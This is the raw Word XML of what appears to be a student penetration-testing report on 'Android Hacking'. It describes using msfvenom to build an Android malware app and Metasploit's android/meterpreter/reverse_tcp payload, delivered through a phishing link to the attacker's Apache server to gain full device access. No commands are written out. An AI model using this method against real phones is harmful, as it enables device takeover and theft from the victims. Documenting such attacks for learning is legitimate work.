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1A8C" w14:textId="4A2CA1C4" w:rsidR="00630833" w:rsidRPr="00630833" w:rsidRDefault="00630833" w:rsidP="00630833">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3600"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc148744914"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Android Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E414F" w14:textId="77777777" w:rsidR="00630833" w:rsidRDefault="00630833" w:rsidP="0089058F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1BA786" w14:textId="20763E3C" w:rsidR="00AE38E3" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="0089058F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5B080BCB" w14:textId="4ECA6297" w:rsidR="00C74136" w:rsidRPr="00871742" w:rsidRDefault="005B1AAB" w:rsidP="00512225">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Android is </w:t>
      </w:r>
      <w:r w:rsidR="002B459D" w:rsidRPr="00871742">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>most common mobile OS in world today</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve">this document is prepared to highlight vulnerability in the android OS, we will use android smartphone to </w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="00871742">
        <w:t xml:space="preserve">test </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve">as Target machine and </w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="00871742">
        <w:t xml:space="preserve">security tools </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve">like Metasploit to exploit into the device </w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="00871742">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> to develop malware for the attack</w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="00871742">
        <w:t xml:space="preserve">. This report </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>demonstrates</w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> security flaws in the </w:t>
      </w:r>
      <w:r w:rsidR="00380197" w:rsidRPr="00871742">
        <w:t>Android OS</w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="00871742">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00110504" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> All necessary steps to attain privilege access will be mentioned in this report</w:t>
      </w:r>
      <w:r w:rsidR="00110504" w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB9150" w14:textId="5F5AA159" w:rsidR="008E0CB7" w:rsidRPr="00871742" w:rsidRDefault="008E0CB7" w:rsidP="00EC3BA5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Name- </w:t>
      </w:r>
      <w:r w:rsidR="005B1AAB" w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hacking by Metasploit tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ACF024" w14:textId="7840F2FF" w:rsidR="008E0CB7" w:rsidRPr="00871742" w:rsidRDefault="008E0CB7" w:rsidP="00EC3BA5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OS Type- </w:t>
      </w:r>
      <w:r w:rsidR="005B1AAB" w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Android </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6 Marshmallow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A71023A" w14:textId="56F8A2D7" w:rsidR="008E0CB7" w:rsidRPr="00871742" w:rsidRDefault="008E0CB7" w:rsidP="00EC3BA5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Source: - </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D572EA" w14:textId="77777777" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F2F973" w14:textId="2C91793C" w:rsidR="00C74136" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc148744915"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4C2F3110" w14:textId="17CBE680" w:rsidR="00C74136" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="001F6024">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We will try to exploit into android smartphone in my case it is Motorola Smartphone which is running on Android 6 Marshmallow OS, so in this scenario we will take a real-life example like if someone sends a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Target and if he/she clicks the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it automatically gets redirected to attacker’s Apache server which is carrying a malware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>preuploaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and if the target downloads it in the phone and install that unknown app it will give a full device access to attacker</w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00380197" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> We will consider a scenario like someone who is having an Android device receives a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00380197" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00380197" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of attacker’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00380197" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00380197" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server which will have a malware for android</w:t>
      </w:r>
      <w:r w:rsidR="000C2956" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> placed.</w:t>
      </w:r>
      <w:r w:rsidR="00380197" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A5207B" w14:textId="78C37635" w:rsidR="002F5585" w:rsidRPr="00871742" w:rsidRDefault="002F5585" w:rsidP="00C74136">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective </w:t>
      </w:r>
      <w:r w:rsidR="000C2956" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to attain privilege access or root access of the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04470AD8" w14:textId="30656891" w:rsidR="002F5585" w:rsidRPr="00871742" w:rsidRDefault="002F5585" w:rsidP="00C74136">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C2956" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C2956" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to develop malware for Android and </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploit tool i.e., inside Kali Linux to attain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DAAA9" w14:textId="0A5A704E" w:rsidR="002F5585" w:rsidRPr="00871742" w:rsidRDefault="002F5585" w:rsidP="00C74136">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We will proceed by basic fundamental steps of Ethical Hacking, that </w:t>
      </w:r>
      <w:r w:rsidR="000C2956" w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are:</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD60730" w14:textId="650F37AF" w:rsidR="002F5585" w:rsidRPr="00871742" w:rsidRDefault="002F5585" w:rsidP="00263DC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– Information Gathering and Scanning </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64552E98" w14:textId="0E1FFE6D" w:rsidR="002F5585" w:rsidRPr="00871742" w:rsidRDefault="002F5585" w:rsidP="00263DC5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871742">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>– Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C1F81B" w14:textId="7C5AA86E" w:rsidR="001F6024" w:rsidRDefault="00263DC5" w:rsidP="001F6024">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">– Gain and Maintaining Access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401C0BBC" w14:textId="77777777" w:rsidR="003A298F" w:rsidRPr="00871742" w:rsidRDefault="003A298F" w:rsidP="001F6024"/>
    <w:p w14:paraId="06B23751" w14:textId="41BE0A99" w:rsidR="00263DC5" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc148744916"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidR="00263DC5" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="05D8A5B5" w14:textId="114BCD95" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="001F6024">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Tool used in this task on kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> will be Netdiscover to identify IP address of Target device, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> to create malware and Metasploit to exploit the Target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF2954" w14:textId="12559460" w:rsidR="008E0CB7" w:rsidRPr="00871742" w:rsidRDefault="008E0CB7" w:rsidP="00C74136">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00AF22C4" w:rsidRPr="00871742">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t>etdiscover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EFC745" w14:textId="7FDEE102" w:rsidR="000C2956" w:rsidRPr="00871742" w:rsidRDefault="000C2956" w:rsidP="00C74136">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D190868" w14:textId="3B150DDD" w:rsidR="00BC6CF3" w:rsidRPr="00871742" w:rsidRDefault="000C2956" w:rsidP="00C74136">
      <w:r w:rsidRPr="00871742">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="00871742">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AF22C4" w:rsidRPr="00871742">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="00871742">
        <w:t>etasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CAAAE6" w14:textId="77777777" w:rsidR="001F6024" w:rsidRPr="00871742" w:rsidRDefault="001F6024" w:rsidP="001F6024"/>
    <w:p w14:paraId="2DDF7DF0" w14:textId="112BC89F" w:rsidR="00AC5DB0" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="00871742">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc148744917"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.0 </w:t>
      </w:r>
      <w:r w:rsidR="00D30958" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Android Hacking</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Short Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7E11C3DC" w14:textId="11763915" w:rsidR="00D30958" w:rsidRPr="00871742" w:rsidRDefault="00AF22C4" w:rsidP="00C207DE">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Target IP: </w:t>
      </w:r>
      <w:r w:rsidR="00A91C09" w:rsidRPr="00871742">
        <w:t>192.168.1.3</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F104D4" w14:textId="03808EB7" w:rsidR="00AF22C4" w:rsidRPr="00871742" w:rsidRDefault="00AF22C4" w:rsidP="00C207DE">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Target Machine: </w:t>
      </w:r>
      <w:r w:rsidR="00C207DE" w:rsidRPr="00871742">
        <w:t xml:space="preserve">Android </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>6 Marshmallow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71530B0F" w14:textId="55F2DC19" w:rsidR="00AF22C4" w:rsidRPr="00871742" w:rsidRDefault="00AF22C4" w:rsidP="00C207DE">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Vulnerability Name: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC3AAF" w14:textId="5AB94755" w:rsidR="00AF22C4" w:rsidRPr="00871742" w:rsidRDefault="00AF22C4" w:rsidP="00C207DE">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Vulnerability Exploited: </w:t>
      </w:r>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C40558" w14:textId="77777777" w:rsidR="00AF22C4" w:rsidRPr="00871742" w:rsidRDefault="00AF22C4" w:rsidP="00C207DE">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Vulnerability Exploited With: Metasploit Framework </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37819019" w14:textId="23FC2B03" w:rsidR="00AC5DB0" w:rsidRPr="00871742" w:rsidRDefault="00AF22C4" w:rsidP="00C207DE">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Payload Used: </w:t>
      </w:r>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006867E4" w:rsidRPr="00871742">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2058FE00" w14:textId="1FA5B27D" w:rsidR="008E0CB7" w:rsidRPr="00630833" w:rsidRDefault="00871742" w:rsidP="00871742">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc148744918"/>
      <w:r w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">3.0 </w:t>
      </w:r>
      <w:r w:rsidR="00472460" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Android Hacking</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="00630833">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E954A5" w14:textId="59BF77A6" w:rsidR="00537362" w:rsidRPr="00871742" w:rsidRDefault="00472460" w:rsidP="008E0CB7">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Android </w:t>
      </w:r>
      <w:r w:rsidR="00537362" w:rsidRPr="00871742">
        <w:t xml:space="preserve">machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve">the Target machine </w:t>
      </w:r>
      <w:r w:rsidR="00537362" w:rsidRPr="00871742">
        <w:t xml:space="preserve">to practices tricks and techniques of Penetration testing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCE725" w14:textId="2EAA75D7" w:rsidR="008877EA" w:rsidRPr="00871742" w:rsidRDefault="008877EA" w:rsidP="008E0CB7">
      <w:r w:rsidRPr="00871742">
        <w:t>We will use Kali Linux as attacker machine and Metasploit framework as mode of exploit.</w:t>
      </w:r>
      <w:r w:rsidR="004E3D8C" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E3D8C" w:rsidRPr="00871742">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E3D8C" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> will be used to develop malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D571F" w14:textId="082A2851" w:rsidR="008E0CB7" w:rsidRPr="00871742" w:rsidRDefault="004B1B1B" w:rsidP="008E0CB7">
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve">Consider a scenario where an android user will receive a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> which links to an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00871742">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> server on which attacker already placed a malware which will help attacker to get root access of the android device once it will be downloaded</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t xml:space="preserve"> and installed</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="001F6024" w:rsidRPr="00871742">
        <w:t>side</w:t>
      </w:r>
      <w:r w:rsidRPr="00871742">
        <w:t xml:space="preserve"> android device.</w:t>
      </w:r>
    </w:p>
